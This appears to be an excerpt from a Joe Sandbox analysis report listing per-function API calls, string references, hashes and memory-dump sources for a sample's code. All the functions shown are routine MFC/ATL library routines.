                                • Instruction ID: e3449ac62316b5dc4192c481d30724f7ad767a5557827a0b5738b5fdb34cab8a
                                • Opcode Fuzzy Hash: 03e97e47a753c94109d70937909d699adf5b8f3066fb3a23e8ea2e0856fa35b5
                                • Instruction Fuzzy Hash: 3091E9B090125ACFDB09DF98C8A8BBEB7B5BF45318F14466CD4252B3C2CB752941CB54
                                APIs
                                • __snwprintf_s.LIBCMTD ref: 006F88D9
                                  • Part of subcall function 008E27F0: __vsnprintf_s_l.LIBCMTD ref: 008E2812
                                • __snwprintf_s.LIBCMTD ref: 006F8943
                                Strings
                                • Afx:%p:%x, xrefs: 006F88CC
                                • Afx:%p:%x:%p:%p:%p, xrefs: 006F8936
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006F899A
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: __snwprintf_s$__vsnprintf_s_l
                                • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 2149080335-4185284615
                                • Opcode ID: 13ed07132a14ef832dece5b916c1a1d4fd4a817ed32752184d8ca113114fd671
                                • Instruction ID: de93d814ac5608c2f79b2bf2d13295b88e06e2e96ff8f0871b11b227ab3a5d67
                                • Opcode Fuzzy Hash: 13ed07132a14ef832dece5b916c1a1d4fd4a817ed32752184d8ca113114fd671
                                • Instruction Fuzzy Hash: B5513D7590020CEFCB04EFA9D881BAE7BB6FF49700F105159F915A7382DB759A40CBA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: derived class.$hWnd = $%08X (nIDC=$%08X) is not a %hs.$Error: Trying to use SubclassWindow with incorrect CWnd$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 0-4120070156
                                • Opcode ID: 4b3cd1a55914ea618c97ed043d45176b5ac6350cd022584300aa8cb0f8bd3c03
                                • Instruction ID: b6e0d5210827b75dfb9f2a71186771140bec768b526a7ea85e491efcaa1d862d
                                • Opcode Fuzzy Hash: 4b3cd1a55914ea618c97ed043d45176b5ac6350cd022584300aa8cb0f8bd3c03
                                • Instruction Fuzzy Hash: 5B417174B40204FFCB44EBA4DD92EAE73F5AF84744F104158FA05AB3D1EA75AE418B54
                                APIs
                                • GlobalLock.KERNEL32(00000000), ref: 007ED20C
                                • _memmove.LIBCMT ref: 007ED23B
                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,00000000), ref: 007ED24D
                                  • Part of subcall function 008B0440: EnterCriticalSection.KERNEL32(007ED26A,009E24EC,?,007ED276), ref: 008B0450
                                • GlobalAlloc.KERNEL32(00000002,?), ref: 007ED1EB
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$Message$AllocCreateCriticalEnterLockPeekPostQuitSectionStream_memmove
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
                                • API String ID: 1793770888-2040512386
                                • Opcode ID: fb47a1dece411ced469427489dee39d72c66904ffddea35efff231a947d8613a
                                • Instruction ID: ad1993e30ffe996141b1cd21f4750cf37f05cab88e52d9b3de55fb180c74f6b5
                                • Opcode Fuzzy Hash: fb47a1dece411ced469427489dee39d72c66904ffddea35efff231a947d8613a
                                • Instruction Fuzzy Hash: 9D418774915249DFDB24EFA1DC89BAF77B8BB4C304F104428E601AB2D0E7B89D80DB95
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memcpy_s_strnlen
                                • String ID: ;|m$__atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
                                • API String ID: 3327212175-2357160796
                                • Opcode ID: db1273921f7872366864dfbb4b6a5536dac9a66c1c4ea4a7da835f46ee9714d3
                                • Instruction ID: 14f354aaf7d0c036617ace978c5d6d3fb6cd9759af0f897a492063e16810ea19
                                • Opcode Fuzzy Hash: db1273921f7872366864dfbb4b6a5536dac9a66c1c4ea4a7da835f46ee9714d3
                                • Instruction Fuzzy Hash: 1B214871F40105AFDB08DA6CDC96EBE73DAEB94314F10C12EF904DB381E970AD0186A5
                                APIs
                                • GetWindowTextA.USER32(00000000,?,00000040), ref: 0070CF09
                                • __snwscanf.LIBCMTD ref: 0070CF1D
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • __strftime_l.LIBCMTD ref: 0070CF66
                                Strings
                                • @, xrefs: 0070CEDE
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp, xrefs: 0070CECF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitTextWindow__snwscanf__strftime_l
                                • String ID: @$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp
                                • API String ID: 2498066157-660313484
                                • Opcode ID: a1cfed561d3b57bdc2afe5fd40f27e1dee78c16fc4fa1ca9ebc7056763dff581
                                • Instruction ID: 8ecfc605387549c1a0689492f1c2f35fbd7e225c83b2efca93467be7a22f4a8e
                                • Opcode Fuzzy Hash: a1cfed561d3b57bdc2afe5fd40f27e1dee78c16fc4fa1ca9ebc7056763dff581
                                • Instruction Fuzzy Hash: C9314CB1900248EFDB14EFA8C895BAE7BB9FF45300F144259F605AB285DB74A941CB62
                                APIs
                                • IsWindow.USER32(000000FE), ref: 00708C51
                                • GetWindowTextA.USER32(000000FE,?,00000000), ref: 00708C90
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • k|o, xrefs: 00708C3E
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp, xrefs: 00708C69
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$PeekPostQuitText
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp$k|o
                                • API String ID: 720052788-1319574930
                                • Opcode ID: 8b7bd482be085774c4385580755469c67564ea266dea6fffdff038f026b55c40
                                • Instruction ID: cbd5c7e5bf65c4877eb688dc53204bca1447f94a7fbe67349c93393ff59b07dc
                                • Opcode Fuzzy Hash: 8b7bd482be085774c4385580755469c67564ea266dea6fffdff038f026b55c40
                                • Instruction Fuzzy Hash: D3315EB5A00209EFCB44DF94C885FAEB7B9FB48320F108669F915973C1DB34A941CBA4
                                APIs
                                • SetDIBColorTable.GDI32(?,00000400,00000000,?,?,?,007ECAD8,00000000,?,?,00000000,00000400,00000400,00000000), ref: 007ED126
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ColorTable
                                • String ID: IsDIBSection()$IsIndexed()$f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h$m_hBitmap != 0
                                • API String ID: 1481107661-1723508190
                                • Opcode ID: 5037f398275de895d79145dcb67d9fe8510682c06ce81765de6ca1ad13c4310e
                                • Instruction ID: 655abb9a07c195e34dcfcc631bce1b305cccb98ac3da9b2ee1fe9c2502da69d3
                                • Opcode Fuzzy Hash: 5037f398275de895d79145dcb67d9fe8510682c06ce81765de6ca1ad13c4310e
                                • Instruction Fuzzy Hash: D0115770B82248BBDB34FA96DC57F3E7365AB98708F210449F504AB2C3EA74DE118661
                                APIs
                                • IsWindow.USER32(?), ref: 006F81E2
                                • GetDlgItem.USER32(?,?), ref: 006F8221
                                • GetWindowTextLengthA.USER32(00000000), ref: 006F8234
                                • GetWindowTextA.USER32(00000000,00000000,?), ref: 006F8255
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006F81F1
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$MessageText$ItemLengthPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 3382567559-4102074842
                                • Opcode ID: 7f6b2d8bc1ea2c5a00e709248fceaef7fe03616151c45cf21fa256ac0b2b1b60
                                • Instruction ID: a3990a69f5fd8e98c765ae83e291a4968deae5781021ebb30d858542be94dea8
                                • Opcode Fuzzy Hash: 7f6b2d8bc1ea2c5a00e709248fceaef7fe03616151c45cf21fa256ac0b2b1b60
                                • Instruction Fuzzy Hash: 0F213071A04108EFCB14EF94DC99EAE77BABF48310F108698F52597391DB34AE41DB94
                                APIs
                                  • Part of subcall function 0072F040: EnterCriticalSection.KERNEL32(009E06A0), ref: 0072F0AF
                                  • Part of subcall function 0072F040: InitializeCriticalSection.KERNEL32(-009E04F7), ref: 0072F0CE
                                  • Part of subcall function 0072F040: LeaveCriticalSection.KERNEL32(009E06A0), ref: 0072F10D
                                  • Part of subcall function 0072F040: EnterCriticalSection.KERNEL32(-009E04F7), ref: 0072F11F
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 006F980C
                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp,0000071E,ED5B0DC1), ref: 006F9828
                                Strings
                                • HtmlHelpA, xrefs: 006F9800
                                • hhctrl.ocx, xrefs: 006F97E0
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006F97D1
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterMessage$AddressFreeInitializeLeaveLibraryPeekPostProcQuit
                                • String ID: HtmlHelpA$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp$hhctrl.ocx
                                • API String ID: 1115049232-794766609
                                • Opcode ID: 71092b7a2aa5d987e8048c7aac0cefdd99ac0a5fe4c70ba55a58c249ba680a7c
                                • Instruction ID: 2e2d7f622bf6984a770eee9dd0e75b77d857ab85817b1f5e401daaf076e3f9b8
                                • Opcode Fuzzy Hash: 71092b7a2aa5d987e8048c7aac0cefdd99ac0a5fe4c70ba55a58c249ba680a7c
                                • Instruction Fuzzy Hash: C4214F74600208EFC714DF94C989FAAB7F6AF88704F24C558EA0997391D775EE41DB60
                                APIs
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h, xrefs: 006F2FB3
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: shared_ptr
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximpl.h
                                • API String ID: 2025160788-1419442112
                                • Opcode ID: fdb11ba430256daf73787f0610698c0c7befef5596fe488927b47b8258d8a8ac
                                • Instruction ID: bbb4d40aafcaea2da96bf916fcf051b01b01f9817e7af48c0d4a79d03b48917a
                                • Opcode Fuzzy Hash: fdb11ba430256daf73787f0610698c0c7befef5596fe488927b47b8258d8a8ac
                                • Instruction Fuzzy Hash: 36217430A4111DEBCB10EBA8C865BBDB7B6AF88700F208199E205AB390DB705F41CF84
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,00000000,007537E9,00000000,00000000), ref: 00753835
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocGlobal
                                • String ID: 7u$7u
                                • API String ID: 3761449716-646100285
                                • Opcode ID: c6ee83544e1e0918d656946fc08bf6e83aea166b8885f01b9d5bf3943f235858
                                • Instruction ID: 68ad468122fccb21db0ccedf663544d7bd7b37c5d28e1e0ea806fc8e1141dc00
                                • Opcode Fuzzy Hash: c6ee83544e1e0918d656946fc08bf6e83aea166b8885f01b9d5bf3943f235858
                                • Instruction Fuzzy Hash: 0121F9B9E04108EFCB04DFA4C484A9EF7B5EB88300F14C699EC19D7351D675EA41CBA0
                                APIs
                                • SetFocus.USER32(00000000,00000000,000000FF,?,?,0070CF3F,?,00000000), ref: 0070CE48
                                • SendMessageA.USER32(00000000,000000B1,00000000,000000FF), ref: 0070CE64
                                Strings
                                • Error: fail validation with no control to restore focus to., xrefs: 0070CE6C
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp, xrefs: 0070CE07, 0070CE80
                                • Warning: CDataExchange::Fail called when not validating., xrefs: 0070CDF3
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: FocusMessageSend
                                • String ID: Error: fail validation with no control to restore focus to.$Warning: CDataExchange::Fail called when not validating.$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp
                                • API String ID: 223698058-4259210859
                                • Opcode ID: 1025fd48524f79482debbb63f4cdbafea034c527557971434e4c08a0c193b1d8
                                • Instruction ID: 986682a5a92e9cb7dfeb25e203d241949fc67e7c44142c561a3ed624709022f8
                                • Opcode Fuzzy Hash: 1025fd48524f79482debbb63f4cdbafea034c527557971434e4c08a0c193b1d8
                                • Instruction Fuzzy Hash: E011AC74E00304FBDB25EB94C856FAEB3BAAB80741F504248F2056B2D1DBB45E80CBA5
                                APIs
                                • FindResourceA.KERNEL32(?,00000000,000000F0), ref: 006FFB54
                                • LoadResource.KERNEL32(?,00000000), ref: 006FFB6B
                                • LockResource.KERNEL32(00000000), ref: 006FFB82
                                • FreeResource.KERNEL32(00000000,00000000,00000000), ref: 006FFBCD
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006FFB96
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$FindFreeLoadLock
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 1078018258-4102074842
                                • Opcode ID: 647a1fae9a0503fadf375b9ef8bf48d93d28c64197e5adee91b33c312158ebdd
                                • Instruction ID: 29a129c7d921855c52cf906c2942886a45642e59265253e261bb5276ff78f48a
                                • Opcode Fuzzy Hash: 647a1fae9a0503fadf375b9ef8bf48d93d28c64197e5adee91b33c312158ebdd
                                • Instruction Fuzzy Hash: 25210675D0420DEFDB14EFE4C859BEEB7B6AF48300F108469EA15A7290D7788A81DF91
                                APIs
                                • GetAtomNameA.KERNEL32(00000000,?,00000100), ref: 0071F396
                                • GetLastError.KERNEL32 ref: 0071F3A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AtomErrorLastName
                                • String ID: z
                                • API String ID: 145693792-1657960367
                                • Opcode ID: a9fe9ab9a683bed0ed63dc6b59c6c362f5cef83922375a86b84ed57fdaecf7c0
                                • Instruction ID: 04d4b47d6bd49c874fd45994b3b82419f6099220a087bfd3808f25e8c341efce
                                • Opcode Fuzzy Hash: a9fe9ab9a683bed0ed63dc6b59c6c362f5cef83922375a86b84ed57fdaecf7c0
                                • Instruction Fuzzy Hash: 23117030618218DBDB20DF6AD8087EA73B4EB19701F1085BAE845D61C0D6BCD9C0DF92
                                APIs
                                • GetModuleHandleA.KERNEL32(?), ref: 006F3EE0
                                • GetProcAddress.KERNEL32(00000000,AfxmReleaseManagedReferences), ref: 006F3EFF
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • AfxmReleaseManagedReferences, xrefs: 006F3EF6
                                • mfcm100d.dll, xrefs: 006F3EB9
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp, xrefs: 006F3EAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$AddressHandleModulePeekPostProcQuit
                                • String ID: AfxmReleaseManagedReferences$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleunk.cpp$mfcm100d.dll
                                • API String ID: 3975739192-3067481203
